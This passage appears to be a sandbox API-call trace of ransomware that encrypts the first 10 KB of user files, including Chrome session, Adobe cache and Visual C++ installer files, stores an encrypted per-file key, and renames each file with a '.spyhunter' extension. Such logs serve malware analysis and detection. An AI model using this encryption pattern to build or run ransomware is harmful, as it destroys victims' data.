lpNumberOfBytesWritten=0x248f6cc*=0x30, lpOverlapped=0x0) returned 1 [0130.228] CloseHandle (hObject=0x17c) returned 1 [0130.228] GetProcessHeap () returned 0x2c0000 [0130.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f83d18 [0130.228] wnsprintfW (in: pszDest=0x2f83d18, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.spyhunter") returned 96 [0130.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.spyhunter")) returned 1 [0130.229] GetProcessHeap () returned 0x2c0000 [0130.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f83d18 | out: hHeap=0x2c0000) returned 1 [0130.229] GetProcessHeap () returned 0x2c0000 [0130.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.229] GetProcessHeap () returned 0x2c0000 [0130.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38f40 | out: hHeap=0x2c0000) returned 1 [0130.235] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6f8 | out: pbBuffer=0x248f6f8) returned 1 [0130.235] GetProcessHeap () returned 0x2c0000 [0130.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.235] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6f0*=0x30) returned 1 [0130.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0130.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned 85 [0130.236] StrStrW (lpFirst="AdobeCMapFnt10.lst", lpSrch=".txt") returned 0x0 [0130.236] GetProcessHeap () returned 0x2c0000 [0130.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.236] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0130.248] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0130.249] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0130.249] GetProcessHeap () returned 0x2c0000 [0130.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0130.249] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.249] WriteFile (in: hFile=0x17c, lpBuffer=0x248f6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6b4, lpOverlapped=0x0 | out: lpBuffer=0x248f6f4*, lpNumberOfBytesWritten=0x248f6b4*=0x4, lpOverlapped=0x0) returned 1 [0130.506] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6b4*=0x30, lpOverlapped=0x0) returned 1 [0130.507] CloseHandle (hObject=0x17c) returned 1 [0130.507] GetProcessHeap () returned 0x2c0000 [0130.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0130.507] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.spyhunter") returned 95 [0130.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.spyhunter")) returned 1 [0130.509] GetProcessHeap () returned 0x2c0000 [0130.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0130.509] GetProcessHeap () returned 0x2c0000 [0130.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0130.509] GetProcessHeap () returned 0x2c0000 [0130.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38c58 | out: hHeap=0x2c0000) returned 1 [0130.509] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6f0 | out: pbBuffer=0x248f6f0) returned 1 [0130.509] GetProcessHeap () returned 0x2c0000 [0130.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0130.510] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6e8*=0x30) returned 1 [0130.510] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0130.636] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0130.636] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 [0130.636] GetProcessHeap () returned 0x2c0000 [0130.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0130.637] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0131.235] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0131.235] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0131.236] GetProcessHeap () returned 0x2c0000 [0131.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0131.236] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.236] WriteFile (in: hFile=0x17c, lpBuffer=0x248f6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x248f6ec*, lpNumberOfBytesWritten=0x248f6ac*=0x4, lpOverlapped=0x0) returned 1 [0131.236] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6ac*=0x30, lpOverlapped=0x0) returned 1 [0131.236] CloseHandle (hObject=0x17c) returned 1 [0131.236] GetProcessHeap () returned 0x2c0000 [0131.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0131.236] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.spyhunter") returned 154 [0131.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.spyhunter")) returned 1 [0131.237] GetProcessHeap () returned 0x2c0000 [0131.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0131.237] GetProcessHeap () returned 0x2c0000 [0131.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0131.237] GetProcessHeap () returned 0x2c0000 [0131.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17ed8 | out: hHeap=0x2c0000) returned 1 [0131.238] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6f0 | out: pbBuffer=0x248f6f0) returned 1 [0131.238] GetProcessHeap () returned 0x2c0000 [0131.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0131.238] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6e8*=0x30) returned 1 [0131.238] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0131.880] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe") returned 89 [0131.880] StrStrW (lpFirst="VC_redist.x86.exe", lpSrch=".txt") returned 0x0 [0131.880] GetProcessHeap () returned 0x2c0000 [0131.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0131.880] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0131.943] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0131.944] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0131.944] GetProcessHeap () returned 0x2c0000 [0131.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0131.944] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.944] WriteFile (in: hFile=0xec, lpBuffer=0x248f6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x248f6ec*, lpNumberOfBytesWritten=0x248f6ac*=0x4, lpOverlapped=0x0) returned 1 [0131.994] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6ac*=0x30, lpOverlapped=0x0) returned 1 [0131.994] CloseHandle (hObject=0xec) returned 1 [0131.994] GetProcessHeap () returned 0x2c0000 [0131.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0131.994] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.spyhunter") returned 99 [0131.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.spyhunter" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.spyhunter")) returned 1 [0131.995] GetProcessHeap () returned 0x2c0000 [0131.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0131.995] GetProcessHeap () returned 0x2c0000 [0131.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0131.995] GetProcessHeap () returned 0x2c0000 [0131.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44f28 | out: hHeap=0x2c0000) returned 1 [0131.995] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6e8 | out: pbBuffer=0x248f6e8) returned 1 [0131.995] GetProcessHeap () returned 0x2c0000 [0131.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0131.995] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6e0*=0x30) returned 1 [0131.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0131.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs") returned 92 [0131.996] StrStrW (lpFirst="Current Tabs", lpSrch=".txt") returned 0x0 [0131.996] GetProcessHeap () returned 0x2c0000 [0131.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0131.996] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f6a4*=0x126, lpOverlapped=0x0) returned 1 [0131.997] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0131.997] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f6a4*=0x126, lpOverlapped=0x0) returned 1 [0131.997] GetProcessHeap () returned 0x2c0000 [0131.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0131.997] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.997] WriteFile (in: hFile=0xec, lpBuffer=0x248f6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x248f6e4*, lpNumberOfBytesWritten=0x248f6a4*=0x4, lpOverlapped=0x0) returned 1 [0131.997] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6a4*=0x30, lpOverlapped=0x0) returned 1 [0131.997] CloseHandle (hObject=0xec) returned 1 [0131.997] GetProcessHeap () returned 0x2c0000 [0131.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0131.997] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.spyhunter") returned 102 [0131.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs.spyhunter")) returned 1 [0131.998] GetProcessHeap () returned 0x2c0000 [0131.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0131.998] GetProcessHeap () returned 0x2c0000 [0131.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0131.998] GetProcessHeap () returned 0x2c0000 [0131.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b880 | out: hHeap=0x2c0000) returned 1 [0131.998] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6e8 | out: pbBuffer=0x248f6e8) returned 1 [0131.998] GetProcessHeap () returned 0x2c0000 [0131.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0131.999] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6e0*=0x30) returned 1 [0131.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0132.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session") returned 95 [0132.001] StrStrW (lpFirst="Current Session", lpSrch=".txt") returned 0x0 [0132.001] GetProcessHeap () returned 0x2c0000 [0132.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0132.001] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f6a4*=0x1d6, lpOverlapped=0x0) returned 1 [0132.001] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffe2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.002] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d6, lpNumberOfBytesWritten=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f6a4*=0x1d6, lpOverlapped=0x0) returned 1 [0132.002] GetProcessHeap () returned 0x2c0000 [0132.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0132.002] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.002] WriteFile (in: hFile=0x16c, lpBuffer=0x248f6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x248f6e4*, lpNumberOfBytesWritten=0x248f6a4*=0x4, lpOverlapped=0x0) returned 1 [0132.002] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f6a4*=0x30, lpOverlapped=0x0) returned 1 [0132.002] CloseHandle (hObject=0x16c) returned 1 [0132.002] GetProcessHeap () returned 0x2c0000 [0132.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.002] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.spyhunter") returned 105 [0132.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session.spyhunter")) returned 1 [0132.003] GetProcessHeap () returned 0x2c0000 [0132.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.033] GetProcessHeap () returned 0x2c0000 [0132.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0132.033] GetProcessHeap () returned 0x2c0000 [0132.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b778 | out: hHeap=0x2c0000) returned 1 [0132.091] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f6e0 | out: pbBuffer=0x248f6e0) returned 1 [0132.091] GetProcessHeap () returned 0x2c0000 [0132.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0132.091] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f6d8*=0x30) returned 1 [0132.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0132.091] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0132.091] StrStrW (lpFirst="data_1", lpSrch=".txt") returned 0x0 [0132.091] GetProcessHeap () returned 0x2c0000 [0132.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0132.091] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f69c*=0x2800, lpOverlapped=0x0) returned 1 [0132.093] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.093] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f69c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f69c*=0x2800, lpOverlapped=0x0) returned 1 [0132.093] GetProcessHeap () returned 0x2c0000 [0132.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0132.093] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 